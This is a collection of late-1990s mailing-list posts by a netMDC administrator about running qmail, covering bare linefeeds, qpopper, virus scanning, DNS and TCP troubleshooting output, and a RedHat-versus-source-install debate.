\ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:25pm up 104 days, 6:28, 3 users, load average: 0.83, 0.26, 0.13
Bare LF problem
ftp://koobera.math.uic.edu/www/docs/smtplf.html We've gotten ahold of the techs at zianet, and were trying to work this problem out. Everybodies hunch about the linefeeds was correct. The question is now how to fix it. He turned on an option in his mail program that basicly, as i understand it no longer allows the mail server to accept mail with bare linefeeds, so any new email that his server accepts will be rfc conforming. But he has 75MB of mail in the queue will stray linefeeds still. What would be the best way to get this mail to us? I thought maybee hacking a perl script to cure the problem, but what other suggestions are there? Also, is there patch to qmail to allow it to accept the bare linefeeds? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 3:40pm up 102 days, 22:43, 3 users, load average: 0.06, 0.09, 0.09
Qpopper?
It appears that Qpopper has released a public beta and i missed the announcement. Is anyone out there running it? Good/bad, any exploits that are known, etc? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:10pm up 88 days, 19:13, 2 users, load average: 0.01, 0.06, 0.07
Re: Virus scanning with qmail
Read the archives, there is a poster to the list that runs a system called "start antivirus" or something similar, it's in his .signature and should come up easily. He has a URL to it on his sig. On Thu, 22 Apr 1999, Tracy R Reed wrote: -| My list of reasons to despise Windows and the dumbf*cks who don't know how to -| use it properly continues to grow. -| -| It has been mandated to me that I will get virus scanning working with our -| mail system. Our sales and marketing people keep getting viruses and passing -| them on to the rest of the company. -| -| So I'm afraid I have to ask: Has *anyone* gotten any sort of decent virus -| scanning setup with qmail? I read a few suggestions on the list during the -| Melissa outbreak but I never saw any good complete plans for making this work. -| This should probably be in the FAQ. -| -| I saw a message in the qmail archive where someone claimed to have amavis -| (http://satan.oih.rwth-aachen.de/AMaViS/) working with qmail. Anyone know how -| this was done? -| -| I really don't want to have to switch to sendmail just to get virus -| scanning... -| -| -- -| Tracy Reed http://www.ultraviolet.org -| Those who do not understand Unix are condemned to reinvent it, poorly. -| -- Henry Spencer -| ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 5:10pm up 77 days, 13 min, 3 users, load average: 0.00, 0.05, 0.03
Re: list.cr.yp.to: Sorry,_I_couldn't_find_a_mail_exchanger_or_IP_address._(#5.4.4)/
Internic has been fucking up lately, i'm sure it has to do with them. Probably a temporary root dns problem.. i've seen them putting domains on hold for no apparent reason lately. On Thu, 25 Mar 1999, Sam wrote: -| 21:42:24 ny qmail: 922329744.843066 starting delivery 583: msg 63539 to -| remote [EMAIL PROTECTED] -| Mar 24 21:42:24 ny qmail: 922329744.843438 status: local 0/10 remote 1/20 -| Mar 24 21:42:35 ny qmail: 922329755.571427 delivery 583: failure: -| Sorry,_I_couldn't_find_a_mail_exchanger_or_IP_address._(#5.4.4)/ -| Mar 24 21:42:35 ny qmail: 922329755.588673 status: local 0/10 remote 0/20 -| -| WTF -| -| Let's go digging... -| -| == -| -| ;; QUERY SECTION: -| ;; list.cr.yp.to, type = MX, class = IN -| -| ;; ANSWER SECTION: -| list.cr.yp.to. 23h59m28s IN MX 10 muncher.math.uic.edu. -| -| ;; AUTHORITY SECTION: -| yp.TO. 23h59m28s IN NS koobera.math.uic.edu. -| -| ;; ADDITIONAL SECTION: -| koobera.math.uic.edu. 29m18s IN A 131.193.178.247 -| -| No A record? Ok then... -| -| ;; QUERY SECTION: -| ;; muncher.math.uic.edu, type = A, class = IN -| -| ;; ANSWER SECTION: -| muncher.math.uic.edu. 29m42s IN A 131.193.178.181 -| -| ;; AUTHORITY SECTION: -| math.UIC.EDU. 29m42s IN NSnewton.math.UIC.EDU. -| math.UIC.EDU. 29m42s IN NSraphael.math.UIC.EDU. -| math.UIC.EDU. 29m42s IN NSuic-dns1.UIC.EDU. -| math.UIC.EDU. 29m42s IN NSuic-dns4.UIC.EDU. -| math.UIC.EDU. 29m42s IN NSuic-dns2.UIC.EDU. -| -| ;; ADDITIONAL SECTION: -| newton.math.UIC.EDU.29m42s IN A 131.193.178.229 -| raphael.math.UIC.EDU. 29m42s IN A 131.193.178.198 -| uic-dns1.UIC.EDU. 1d19h50m3s IN A 128.248.2.50 -| uic-dns4.UIC.EDU. 2h59m IN A 128.248.3.53 -| uic-dns2.UIC.EDU. 1d19h50m3s IN A 128.248.7.50 -| -| -| Looks fine, so what happened? -| -| Let's try this again... -| -| ;; list.cr.yp.to, type = MX, class = IN -| -| ;; ANSWER SECTION: -| list.cr.yp.to. 23h58m34s IN MX 10 muncher.math.uic.edu. -| -| ;; AUTHORITY SECTION: -| yp.TO. 23h58m34s IN NS koobera.math.uic.edu. -| -| ;; ADDITIONAL SECTION: -| muncher.math.uic.edu. 29m6s IN A 131.193.178.181 -| koobera.math.uic.edu. 28m24s IN A 131.193.178.247 -| -| -| So the second time I'm getting an A record on the first query? -| -| Interesting... -| -| AHA!!! -| -| [root@ny root]# dig @uic-dns4.UIC.EDU. muncher.math.uic.edu. a -| -| ; DiG 8.1 @uic-dns4.UIC.EDU. muncher.math.uic.edu. a -| ; (1 server found) -| ;; res options: init recurs defnam dnsrch -| ;; got answer: -| ;; -HEADER- opcode: QUERY, status: NXDOMAIN, id: 10 -| -| -| This server is FUBARed. Someone, tell DJB. -| -| -- -| Sam -| ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 9:15pm up 48 days, 3:55, 3 users, load average: 0.08, 0.12, 0.10
Re: Documentation
Kai, i think you probably spent entirely too much time researching and
replying to this message =)
On Thu, 18 Mar 1999, Kai MacTane wrote:
-| Text written by Diego Puertas at 08:30 PM 3/18/99 +:
-| In order to never ask a cuestión like this again:
-|
-| ¡Hola a Venezuela de los EE.UU.! Trataré a contestar en español -- lo
-| estudié en liceo, por eso puede ser un poquito débil.
-|
-| [Greetings to Venezuela from the U.S! I'm going to try to answer in Spanish
-| -- I learned it high school, so it may be a bit rusty.]
-|
-| were can I find documentation for qmail ? , the most easy readable there
-| is
-|
-| Hay un Proyecto por Documentación de Qmail al URL:
-| [There is the Qmail Documentation Project at the URL:]
-|
-| http://qmail-docs.surfdirect.com.au/
-|
-| Ese contiene los paginas manuales ("man pages") por qmail 1.03 y 1.01 en
-| formato HTML, y muchos "FAQs" que tratan de recibimiento virtual, la
-| retransmisión selectiva, y la registración.
-|
-| [It contains the qmail man pages (for versions 1.03 and 1.01) in HTML
-| format, plus many FAQs on subjects like virtual hosting, selective
-| relaying, and logging.]
-|
-| Tristamente, toda la documentación es en ingles.
-| [Sadly, all the documentation is in English.]
-|
-| is there some kind of tutorial anyware?
-|
-| Es lástima que no hay tutoriál electrónico por qmail (o si hay, no lo
-| conozco).
-|
-| [Unfortunately, there are no qmail tutorials online (that I know of).]
-|
-| Ojalá que mi español no sea tan malo como creo -- tuve que utilizar el
-| servicio de traducción de AltaVista para algunos términos técnicos, y esa
-| traducción puede ser totalmente incorrecta.
-|
-| [I hope my Spanish isn't as awful as I think it is -- I had to use
-| AltaVista's translation service for some technical terms, and that
-| translation may be completely wrong.]
-|
-| -
-| Kai MacTane
-| System Administrator
-| Online Partners.com, Inc.
-| -
-| From the Jargon File: (v4.0.0, 25 Jul 1996)
-|
-| fix /n.,v./
-|
-| What one does when a problem has been reported too many times to
-| be ignored.
-|
-|
___ _ __ _
__ /___ ___ /__ John Gonzalez/Net.Tech
__ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC!
_ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052
/_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com
[-[system info]---]
6:30pm up 42 days, 1:10, 2 users, load average: 0.00, 0.05, 0.07
Re: qpopper vulnerability?
On Tue, 9 Mar 1999 [EMAIL PROTECTED] wrote: -| On Tue, Mar 09, 1999 at 09:56:41AM +0100, Peter van Dijk wrote: -| rephrase: no bugs have been found... after the amount of bugs found in previous -| qpopper releases, I don't trust it. -| -| okay (: -| right you are ... the only thing that makes me use it anyways is it`s -| bulletinboard feature ... can you describe the feature? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:20pm up 32 days, 19:00, 2 users, load average: 0.04, 0.06, 0.01
Re: qpopper vulnerability?
has anyone messed with the popbull feature with virtual domains or the vmailmgrd patch? On Tue, 9 Mar 1999, Aaron L. Meehan wrote: -| This would be the same feature supplied in the popbull patch to -| qmail-pop3d available on the qmail.org web site(s). Namely, -| the ability to send a mail bulletin to all users without the need to -| deliver a unique message to each mailbox. I find it quite useful. -| -| Aaron -| -| Quoting John Gonzalez/netMDC admin ([EMAIL PROTECTED]): -| On Tue, 9 Mar 1999 [EMAIL PROTECTED] wrote: -| -| -| On Tue, Mar 09, 1999 at 09:56:41AM +0100, Peter van Dijk wrote: -| -| rephrase: no bugs have been found... after the amount of bugs found in previous -| -| qpopper releases, I don't trust it. -| -| -| -| okay (: -| -| right you are ... the only thing that makes me use it anyways is it`s -| -| bulletinboard feature ... -| -| can you describe the feature? -| ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:25pm up 32 days, 19:05, 2 users, load average: 0.03, 0.05, 0.00
Re: Qmail (as seen on a not so good day).
On Thu, 18 Feb 1999, Jere Cassidy wrote: -| If i do a "netstat -n|grep ":25 " I get almost 700 connections although -| most of these are in the "CLOSE WAIT" stage or something similar. What kernel revision are you running? I know some of the 2.0.3X kernels pre .36 supposedly have a problem with never dropping connections. So, even though the client side has dropped, the server keeps it alive, and this is counted in tcp servers max. Here's an example: tcp32696645 ns1.netmdc.com:17117pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32696555 ns1.netmdc.com:17162pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32696675 ns1.netmdc.com:25151pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32216638 ns1.netmdc.com:25351pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32696670 ns1.netmdc.com:26194pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32696625 ns1.netmdc.com:14393pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32696625 ns1.netmdc.com:16940pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32696630 ns1.netmdc.com:16948pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32696615 ns1.netmdc.com:17031pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32696689 ns1.netmdc.com:17204pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32696615 ns1.netmdc.com:17531pm3-1.netmdc.com:telnet FIN_WAIT1 tcp32696576 ns1.netmdc.com:18093pm3-1.netmdc.com:telnet FIN_WAIT1 tcp0 14706 ns1.netmdc.com:telnet byu006601wks.rn.b:61165 ESTABLISHED tcp 19 0 ns1.netmdc.com:5299 pm2-4.netmdc.com:telnet CLOSE_WAIT This happened when i had to reboot the portmaster, the connections never cleaned up properly. This was WELL over a week ago ;) ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:30pm up 13 days, 19:10, 3 users, load average: 0.25, 0.48, 0.27
Supervise/Tcpserver/cyclog
I'm wondering if anyone here is running the above combination? I have qmaild running under tcpserver at the time, but now our machine has become busy enough that the pop3 service is looping (in inetd) and want to replace it with tcpserver. I've also noticed that the single process on the machine that is a hog is the syslog process, so i also want to replace this with cyclog. What my question is: I'm running qmail1.03 with Bruce Guenters vmailmgrd package (a checkpw replacement) -- what kind of command lines is everyone else running? I need one for qmail and for qmail-pop3d -- anyone have some suggestions? Linux/Slackware. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:20am up 115 days, 14:59, 4 users, load average: 0.12, 0.15, 0.10
Re: qmail-popbull.patch
I'm not sure what the patch is -- i've never used/researched it, but it's probaby just that, a patch :) You need to man the 'patch' program, it's a diff and probably changes some of the default code for a qmail-1.0X (make sure you use the proper version the patch was designed for) man patch should answer all your questions. On Fri, 22 Jan 1999, Steve Vertigan wrote: -| I'm interested in installing Russ's qmail-popbull.patch but my knowledge of -| c is about limited to "make install". The only information given on the -| site is a link to the file itself so could someone tell me what to do with -| it? -| -| Regards, -| --Steve -| -| ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:25am up 103 days, 4:04, 3 users, load average: 0.06, 0.06, 0.07
Re: DNS restart causes lost mail
Which brings me to some important bit of info, just in case people out there havent heard. There is a possible hole in Bind 8.2 and 4.9.X trees, either remote root exploits, or DOS attacks. The current patch level is pl5, available at www.isc.org -- as well as info regarding the potential exploit. (sorry, some may not be on bugtraq, etc. i've found alot of people havent heard about this yet) On Thu, 18 Nov 1999, Adam D . McKenna wrote: On Thu, Nov 18, 1999 at 04:45:29PM +0100, Markus Stumpf wrote: On Thu, Nov 18, 1999 at 09:13:21AM -0500, Peter Green wrote: When a new zone is added to the named server, it needs to be restarted to actually read that zone file. This is NOT true. We manage a few thousand domains and the bind process has typical uptime of 2-3 month. If we had to restart our binds for every domain we add we'd do nothing else. Just add it to the named.conf file and reload. In fact, bind 8.2 has the ability to do a reload on *individual* zones. Just type "ndc reload zone". --Adam ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:05am up 118 days, 20:24, 3 users, load average: 0.26, 0.36, 0.32
Re: I was wrong.
On Fri, 8 Jan 1999, Reid Sutherland wrote: -| Never doubt DJB. -| -| Foolish, foolish boy. :) I have just as much faith in Russ, as i do in DJB. They both have donated MASSIVE amounts of resources and help to the community. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 1:20pm up 89 days, 16:59, 6 users, load average: 0.10, 0.18, 0.15
Re: Redhat qmail
On Tue, 29 Dec 1998, Peter C. Norton wrote: -| He's also producing a small set of utilities that interact with each -| other (doing it very well, too - no disagreement there). Comparing -| the scope and complexity of Dan's projects to an OS vendors mission is -| apples and oranges. Well. Have you visited his site yet? Have you seen the AMOUNT of tools that he creates? He doesnt just make software that interacts with "each other" he makes ALL kinds of software that will work on almost any unix system, that work with countless other utilities.. (tcpserver springs, to mind) and has to program for tons of other OS's. He's also pretty much a 1 man team, whereas redhat is a whole company. Your right, it's like comparing apples to oranges - but DJB does deserve the respect that he gets. Oh, i fergot to mention. Redhat makes money, DJB does not. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:10am up 79 days, 14:49, 3 users, load average: 0.05, 0.11, 0.09
Re: Queueing remote deliveries at specific intervals (ala sendmail -q)?
On Tue, 29 Dec 1998, [ISO-8859-1] Robin Smidsrød wrote: -| -| I guess the subject says it all? -| -| How is it possible to enforce a "sendmail -q" specific behaviour in qmail? -| I'm using it in a dial-on-demand system, and I want to be able to flush the -| remote mail queue at specific intervals. -| -| Anybody'd care to enlighten me? Send an -ALRM signal to qmail-send and it will re-try the queue. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:05pm up 79 days, 15:44, 3 users, load average: 0.01, 0.04, 0.06
Re: Frivolous forking
On Thu, 24 Dec 1998, Sam wrote: -| Sure it's been fixed. But have 90% of all redhat owners out there changed -| it? No. Why? Because the ones that have been hacked are clueless. -| -| I see by far more clueless admins who are running Solaris with the OEM -| Sendmail 8.6, which are hacked far more often than RH Linux. Guess it just depends on the lists that you hang out on :) -| Despite the fact that Sun had the 8.8.8 patch for more than a year. And would you agree that the more 'clueless' admins suffer from being hacked? -| Great! I didnt say all redhat boxes have been hacked. I said 100% of all -| HACKED boxes have been redhat. Big difference. -| -| According to the same kind of logic, Solaris must be the least secure -| implementation of SVR4. It's possbile. But it's also possible that more 'cluefull' people are running solaris and patch it up. I see TONS of bugs/holes/solaris fly across my desk all the time. But it just happens that most of the time, cluefull admins are running the system and either already have the service turned off, or have patched. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 5:00pm up 74 days, 20:39, 5 users, load average: 0.02, 0.10, 0.09
Re: Frivolous forking
On Wed, 23 Dec 1998, Petr Novotny wrote: -| For me install means rpm -ivh qmail*rpm. That's one of a hell of a -| difference. I don't recompile every single thing (hell, I could -| even live without a gcc installed) I install - I just tend to trust -| the PGP signatures, MD5 checksums and RedHat fixing holes ASAP. I've been remaining quiet this whole time about this "qmail/djb vs. redhat" situation, but this one really erked me. SOMEONE has to write the program. SOMEONE has to write the rpm. SOMEONE has to do the work. If we constantly rely on RPM's to do for us the fundamental things of installing, and we get USED to that, we are going experience serious problems in the future. Most people dont even look at an RPM before they install it. They just blindly rpm -i the package - that's almost as bad as running untrusted binaries. So if all you are looking for is pure simplicity of running a system and installing packages, i suggest you all use NT. Hell, i mean that's why i switched over to different unix flavors. The control they gave me. The source. The Makefile. Things i can change, things i can look at. Things i can make sure arent malicious. RPM's are for the most part very evil. I see their purpose for some things: 1. VERY simple packages (which you shouldnt need an RPM form anywayz, since they are simple) 2. VERY complex processes (which you shouldnt use an RPM, since you are going to have to know about the program before you can get any real work done with it. Or otherwise we'll have open relays all over the place, because someone just rpm -i'ed the package WITHOUT reading the docs or without spending any time on the thing like they should or WOULD have to, installing it PROPERLY.) 3. BEGINNERS that just want to get up and running AFAP (which, shouldnt be installing mission critical software on an open internet system that can potentially affect all of us.) 4. This has been proved OVER and OVER again. Redhat systems are not only the most hacked systems (that would be obvious, since most distributions sold are redhat) but they also have the "less educated" level of users. I'd say roughly 90% of all systems hacked are redhat systems. They are shipped vulnerable, and the user never knows enough to upgrade their systems. They get hacked, their upstream pulls the plug, they format/reinstall, and get hacked again, and never figure out what's going on. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:20am up 73 days, 13:59, 4 users, load average: 0.13, 0.13, 0.09
